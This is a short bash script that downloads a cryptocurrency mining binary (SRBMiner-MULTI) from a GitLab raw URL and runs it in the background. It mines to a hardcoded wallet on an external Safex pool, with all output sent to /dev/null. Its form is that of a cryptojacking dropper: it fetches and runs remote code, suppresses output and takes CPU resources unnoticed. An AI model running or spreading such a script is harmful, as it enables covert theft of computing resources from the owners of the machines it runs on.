#!/bin/bash
wget https://gitlab.com/vienatasari/dag/-/raw/main/SRBMiner-MULTI
chmod +x SRBMiner-MULTI
./SRBMiner-MULTI --algorithm randomsfx --pool sf.pool-pay.com:4025 --wallet SafexsnsPwCNzaHDEfcGTzgW9rNcKQhAmBFNrH8KRUjvcfZHGuyKAgSd1Gd5C72WVwLtUfhA3tyXsLQnkXbH1JwGHkgxtdoGRvc3n.$(echo $(shuf -i 1-20000 -n 1)-kzp) --disable-gpu --cpu-threads 8 > /dev/null 2>&1 &
uname -a
